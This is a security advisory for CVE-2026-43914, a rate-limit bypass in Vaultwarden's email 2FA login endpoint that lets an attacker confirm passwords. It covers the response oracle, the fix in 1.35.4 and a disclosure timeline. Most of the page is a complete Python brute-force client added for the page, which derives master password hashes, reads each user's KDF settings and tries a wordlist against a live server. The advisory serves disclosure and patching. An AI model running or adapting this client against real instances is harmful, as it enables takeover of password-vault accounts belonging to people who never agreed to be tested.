CVE-2026-43914 ‒ Brute-Force Protection Bypass in Vaultwarden via Email 2FA Endpoint


Description

Vaultwarden is a Bitwarden-compatible server written in Rust. In versions prior to 1.35.4, the login brute-force protection can be bypassed when email 2FA is enabled on the instance. The unprotected send_email_login endpoint acts as an oracle for valid username-password combinations, allowing an attacker to brute-force passwords without rate-limiting. This affects all users on the instance, even those who have not configured email 2FA themselves.

Vulnerability

Vaultwarden implements the check_limit_login function to rate-limit failed login attempts. This protection is applied to _sso_login, _password_login and _api_key_login.

However, when email 2FA is enabled on the instance, the unprotected send_email_login function in email.rs (API endpoint /api/two-factor/send-email-login) also validates the username-password combination and therefore acts as an oracle. Because check_limit_login is not called from this endpoint, an attacker can abuse it to brute-force passwords without ever hitting the rate limiter. This works against every user on the instance, including users who have not configured email 2FA themselves.

The endpoint’s response distinguishes between credential states:

  • If the username-password combination is correct, the endpoint either returns HTTP 200 and sends a 2FA code via email to the victim (when that user has email 2FA configured), or returns the message Two factor not found (when the user has not). In both cases the attacker learns that the password is correct.
  • If the username-password combination is wrong, it returns Username or password is incorrect.

This behavioural difference allows an attacker to perform a password brute-force attack against any account on the instance. Note that a correct guess against a user who has email 2FA configured triggers a 2FA email to that victim, so the attack is not entirely silent for such accounts; for users without email 2FA the oracle answer leaves no trace with the victim.

PoC

A small Python PoC that iterates a wordlist and reports valid credentials using the default pbkdf2-sha256 with 600,000 iterations was provided to the vendor. A more robust PoC would query /identity/accounts/prelogin per target user to dynamically retrieve the KDF type and iteration count.
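An added example, written for this page and not the PoC that was sent to the vendor nor Vaultwarden's own code. It exercises the oracle described above and implements the per-user prelogin lookup the paragraph suggests, so the KDF iteration count is read from the server rather than assumed. Assumptions not stated on the page: the send-email-login and prelogin requests carry the JSON fields `email` / `masterPasswordHash` and return `kdf` / `kdfIterations` respectively (as the Bitwarden client does), the server's error strings appear verbatim in the response body, and the client-side master password hash derivation is the one implemented in `master_password_hash` below. Only PBKDF2 (kdf type 0) is derived; other KDF types are refused. The oracle is passed in as a callable so the logic can be run offline against a fake server.

```python
"""Brute-force oracle client for /api/two-factor/send-email-login (added example).

Not the advisory author's PoC and not Vaultwarden code. Field names, the kdf
type constant and the hash derivation are assumptions based on the Bitwarden
client; the response strings are the ones the advisory quotes.
"""
import base64
import hashlib
import json
import urllib.error
import urllib.request
from typing import Callable, Iterable, Optional

KDF_PBKDF2 = 0  # Bitwarden kdf type for PBKDF2-SHA256 (assumption, client convention)


def master_password_hash(email: str, password: str, iterations: int) -> str:
    """Derive the value a Bitwarden client sends as masterPasswordHash.

    master key  = PBKDF2-SHA256(password, salt=lowercased email, iterations)
    login hash  = PBKDF2-SHA256(master key, salt=password, 1 iteration)
    Returned base64-encoded. (Assumed to match the client; not from the page.)
    """
    salt = email.strip().lower().encode()
    master_key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, 32)
    login_hash = hashlib.pbkdf2_hmac("sha256", master_key, password.encode(), 1, 32)
    return base64.b64encode(login_hash).decode()


def classify(status: int, body: str) -> str:
    """Map the endpoint's reply onto the three states the advisory describes."""
    if "Username or password is incorrect" in body:
        return "invalid"
    if "Two factor not found" in body:
        return "valid-no-email-2fa"  # password correct, victim has no email 2FA
    if status == 200:
        return "valid-email-sent"    # password correct, 2FA code mailed to victim
    return "unknown"


def http_json(base_url: str, path: str, payload: dict) -> tuple[int, str]:
    """POST a JSON body and return (status, body) without raising on 4xx."""
    req = urllib.request.Request(
        base_url + path, data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def kdf_params(base_url: str, email: str) -> tuple[int, int]:
    """Fetch (kdf type, iterations) for a user from the prelogin endpoint."""
    _, body = http_json(base_url, "/identity/accounts/prelogin", {"email": email})
    data = json.loads(body)
    return int(data.get("kdf", KDF_PBKDF2)), int(data["kdfIterations"])


def live_oracle(base_url: str) -> Callable[[str, str], tuple[int, str]]:
    """Oracle that talks to a real instance; field names are an assumption."""
    def send(email: str, mph: str) -> tuple[int, str]:
        return http_json(base_url, "/api/two-factor/send-email-login",
                         {"email": email, "masterPasswordHash": mph})
    return send


def brute_force(email: str, wordlist: Iterable[str], iterations: int,
                oracle: Callable[[str, str], tuple[int, str]]
                ) -> Optional[tuple[str, str]]:
    """Try each candidate through oracle(email, masterPasswordHash).

    Returns (password, state) on the first confirmed hit, else None. On
    vulnerable versions none of these requests count against check_limit_login.
    """
    for candidate in wordlist:
        mph = master_password_hash(email, candidate, iterations)
        state = classify(*oracle(email, mph))
        if state.startswith("valid"):
            return candidate, state
    return None


if __name__ == "__main__":
    import sys
    base, target, words = sys.argv[1], sys.argv[2], sys.argv[3]
    kdf, iters = kdf_params(base, target)
    if kdf != KDF_PBKDF2:
        sys.exit(f"only PBKDF2 is implemented here; account uses kdf={kdf}")
    with open(words) as fh:
        hit = brute_force(target, (line.rstrip("\n") for line in fh), iters, live_oracle(base))
    print(hit or "no match in wordlist")
```

Usage against a lab instance: `python3 poc.py https://vault.example.test victim@example.test wordlist.txt`. Each candidate costs one client-side PBKDF2 run at the server-announced iteration count, so the wordlist throughput is bounded by local CPU rather than by the server on unpatched versions; on 1.35.4 and later the same requests are expected to hit the rate limiter like a normal login.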

Mitigations

Update to Vaultwarden version 1.35.4 or later. The fix adds the check_limit_login call to send_email_login so that the endpoint is subject to the same rate-limiting as the regular login endpoints.

Timeline

Date         Action
15.02.2026   Vulnerability reported to security@vaultwarden.org
16.02.2026   Vaultwarden acknowledged the report
23.02.2026   Fix merged via PR #6867
25.04.2026   Vaultwarden published GitHub security advisory GHSA-c5rv-q295-7w4g
11.05.2026   CVE-2026-43914 was published
20.05.2026   Release of this advisory
